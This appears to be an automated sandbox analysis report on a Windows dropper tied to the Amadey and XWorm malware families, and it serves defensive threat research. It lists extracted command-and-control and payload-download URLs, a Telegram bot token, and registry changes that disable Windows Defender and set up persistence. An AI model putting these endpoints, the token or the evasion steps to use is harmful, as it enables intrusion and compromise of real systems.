Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22/02/2025, 07:54
Static task
static1
Behavioral task
behavioral1
Sample
88345910e7756216c80bf4046952980b.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
88345910e7756216c80bf4046952980b.exe
Resource
win10v2004-20250217-en
General
-
Target
88345910e7756216c80bf4046952980b.exe
-
Size
2.1MB
-
MD5
88345910e7756216c80bf4046952980b
-
SHA1
f508e862e3d2b48a83dfa064d4655035953482c0
-
SHA256
c9b511ede4963bc4ce43425a950014c7b4fedde81add8febb049359e2d3e4704
-
SHA512
a53f0242ae77be006bf9d22b42764de414f94e98dd5eb716db5d7286555826a3317a80a00c0c2448ad836c16181168c5f77da954cc29978f1d023bac42d28845
-
SSDEEP
49152:yhpo+E+QRPrT0O7tDr5uWwt4ZKYXhRn+lOxfMfps:yhy+xIzT0A5uruXLn+lOxfMf
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
amadey
5.21
a4d2cd
http://cobolrationumelawrtewarms.com
http://�������� jlgenfekjlfnvtgpegkwr.xyz
-
install_dir
a58456755d
-
install_file
Gxtuum.exe
-
strings_key
00fadbeacf092dfd58b48ef4ac68f826
-
url_paths
/3ofn3jf3e2ljk/index.php
Extracted
xworm
5.0
185.163.204.65:7000
SWaSxcOz2FkLWFU7
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042
Signatures
-
Amadey family
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x000500000001966c-153.dat family_xworm behavioral1/memory/2036-162-0x0000000000DD0000-0x0000000000E00000-memory.dmp family_xworm behavioral1/memory/1624-516-0x0000000000D50000-0x0000000000D80000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2004-217-0x0000000000F90000-0x00000000013F6000-memory.dmp healer behavioral1/memory/2004-216-0x0000000000F90000-0x00000000013F6000-memory.dmp healer behavioral1/memory/2004-249-0x0000000000F90000-0x00000000013F6000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE -
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 88345910e7756216c80bf4046952980b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8QQOJj9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 83f03064e5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebp51gY.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ uXivbut.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ uXivbut.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sha256.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8QQOJj9.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 19 1748 powershell.exe 23 1604 powershell.exe -
pid Process 2680 powershell.exe 1644 powershell.exe 2064 powershell.exe 1748 powershell.exe 1604 powershell.exe -
Downloads MZ/PE file 12 IoCs
flow pid Process 18 2612 skotes.exe 69 2612 skotes.exe 19 1748 powershell.exe 23 1604 powershell.exe 5 2612 skotes.exe 5 2612 skotes.exe 5 2612 skotes.exe 5 2612 skotes.exe 5 2612 skotes.exe 5 2612 skotes.exe 5 2612 skotes.exe 5 2612 skotes.exe -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 88345910e7756216c80bf4046952980b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sha256.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 83f03064e5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 83f03064e5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sha256.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 88345910e7756216c80bf4046952980b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uXivbut.exe -
Executes dropped EXE 22 IoCs
pid Process 2612 skotes.exe 1980 8QQOJj9.exe 2460 uXivbut.exe 1504 Gxtuum.exe 1668 d538f57e36.exe 2632 sha256.exe 2968 DF9PCFR.exe 2036 7tzlyz8.exe 3020 45d43ed47c.exe 2004 TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE 2228 483d2fa8a0d53818306efeb32d3.exe 1020 4ec3a9fcdf.exe 1468 e128512ea8.exe 2920 83f03064e5.exe 2972 DF9PCFR.exe 1028 ebp51gY.exe 1844 DF9PCFR.exe 1596 uXivbut.exe 2684 8QQOJj9.exe 2956 712a5812b7.exe 3020 d842b69899.exe 1624 7tzlyz8.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine sha256.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine 83f03064e5.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine uXivbut.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine 8QQOJj9.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine uXivbut.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine ebp51gY.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine 8QQOJj9.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine 88345910e7756216c80bf4046952980b.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine skotes.exe -
Loads dropped DLL 44 IoCs
pid Process 2816 88345910e7756216c80bf4046952980b.exe 2816 88345910e7756216c80bf4046952980b.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2460 uXivbut.exe 2460 uXivbut.exe 2612 skotes.exe 1668 d538f57e36.exe 1668 d538f57e36.exe 1668 d538f57e36.exe 1504 Gxtuum.exe 1504 Gxtuum.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2968 DF9PCFR.exe 1748 powershell.exe 1748 powershell.exe 1604 powershell.exe 1604 powershell.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2612 skotes.exe 2956 712a5812b7.exe 2956 712a5812b7.exe 2956 712a5812b7.exe 1844 DF9PCFR.exe 2612 skotes.exe 3020 d842b69899.exe 3020 d842b69899.exe 3020 d842b69899.exe 2612 skotes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\45d43ed47c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091274101\\45d43ed47c.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091275021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001997c-171.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 2816 88345910e7756216c80bf4046952980b.exe 2612 skotes.exe 1980 8QQOJj9.exe 2460 uXivbut.exe 1504 Gxtuum.exe 2632 sha256.exe 2004 TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE 2228 483d2fa8a0d53818306efeb32d3.exe 2920 83f03064e5.exe 1028 ebp51gY.exe 1596 uXivbut.exe 2684 8QQOJj9.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2968 set thread context of 2972 2968 DF9PCFR.exe 50 PID 1020 set thread context of 2748 1020 4ec3a9fcdf.exe 74 PID 1844 set thread context of 1428 1844 DF9PCFR.exe 81 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 88345910e7756216c80bf4046952980b.exe File created C:\Windows\Tasks\Gxtuum.job uXivbut.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 37 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4ec3a9fcdf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 712a5812b7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e128512ea8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DF9PCFR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8QQOJj9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 83f03064e5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8QQOJj9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 45d43ed47c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DF9PCFR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uXivbut.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d842b69899.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 88345910e7756216c80bf4046952980b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DF9PCFR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebp51gY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d538f57e36.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1728 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 83f03064e5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 83f03064e5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 83f03064e5.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2128 schtasks.exe 2984 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2036 7tzlyz8.exe -
Suspicious behavior: EnumeratesProcesses 58 IoCs
pid Process 2816 88345910e7756216c80bf4046952980b.exe 2612 skotes.exe 1980 8QQOJj9.exe 2460 uXivbut.exe 1504 Gxtuum.exe 1980 8QQOJj9.exe 1980 8QQOJj9.exe 1980 8QQOJj9.exe 1980 8QQOJj9.exe 2632 sha256.exe 2036 7tzlyz8.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 2004 TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE 2680 powershell.exe 1644 powershell.exe 2064 powershell.exe 2004 TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE 2004 TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE 1604 powershell.exe 1604 powershell.exe 1604 powershell.exe 2228 483d2fa8a0d53818306efeb32d3.exe 2920 83f03064e5.exe 2920 83f03064e5.exe 2920 83f03064e5.exe 2920 83f03064e5.exe 2920 83f03064e5.exe 1468 e128512ea8.exe 1468 e128512ea8.exe 1468 e128512ea8.exe 1468 e128512ea8.exe 2972 DF9PCFR.exe 2972 DF9PCFR.exe 2972 DF9PCFR.exe 2972 DF9PCFR.exe 3024 AddInProcess32.exe 3024 AddInProcess32.exe 3024 AddInProcess32.exe 3024 AddInProcess32.exe 1028 ebp51gY.exe 1596 uXivbut.exe 1028 ebp51gY.exe 1028 ebp51gY.exe 1028 ebp51gY.exe 1028 ebp51gY.exe 2684 8QQOJj9.exe 2956 712a5812b7.exe 2956 712a5812b7.exe 2956 712a5812b7.exe 3020 d842b69899.exe 3020 d842b69899.exe 3020 d842b69899.exe 2684 8QQOJj9.exe 2684 8QQOJj9.exe 2684 8QQOJj9.exe 2684 8QQOJj9.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2036 7tzlyz8.exe Token: SeDebugPrivilege 2036 7tzlyz8.exe Token: SeDebugPrivilege 1748 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 2004 TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 2824 AddInProcess32.exe Token: SeDebugPrivilege 2956 712a5812b7.exe Token: SeDebugPrivilege 3020 d842b69899.exe Token: SeDebugPrivilege 1624 7tzlyz8.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 2816 88345910e7756216c80bf4046952980b.exe 2460 uXivbut.exe 3020 45d43ed47c.exe 3020 45d43ed47c.exe 3020 45d43ed47c.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3020 45d43ed47c.exe 3020 45d43ed47c.exe 3020 45d43ed47c.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2036 7tzlyz8.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2816 wrote to memory of 2612 2816 88345910e7756216c80bf4046952980b.exe 30 PID 2816 wrote to memory of 2612 2816 88345910e7756216c80bf4046952980b.exe 30 PID 2816 wrote to memory of 2612 2816 88345910e7756216c80bf4046952980b.exe 30 PID 2816 wrote to memory of 2612 2816 88345910e7756216c80bf4046952980b.exe 30 PID 2612 wrote to memory of 1980 2612 skotes.exe 32 PID 2612 wrote to memory of 1980 2612 skotes.exe 32 PID 2612 wrote to memory of 1980 2612 skotes.exe 32 PID 2612 wrote to memory of 1980 2612 skotes.exe 32 PID 2612 wrote to memory of 2460 2612 skotes.exe 33 PID 2612 wrote to memory of 2460 2612 skotes.exe 33 PID 2612 wrote to memory of 2460 2612 skotes.exe 33 PID 2612 wrote to memory of 2460 2612 skotes.exe 33 PID 2460 wrote to memory of 1504 2460 uXivbut.exe 34 PID 2460 wrote to memory of 1504 2460 uXivbut.exe 34 PID 2460 wrote to memory of 1504 2460 uXivbut.exe 34 PID 2460 wrote to memory of 1504 2460 uXivbut.exe 34 PID 2612 wrote to memory of 1668 2612 skotes.exe 38 PID 2612 wrote to memory of 1668 2612 skotes.exe 38 PID 2612 wrote to memory of 1668 2612 skotes.exe 38 PID 2612 wrote to memory of 1668 2612 skotes.exe 38 PID 2612 wrote to memory of 1668 2612 skotes.exe 38 PID 2612 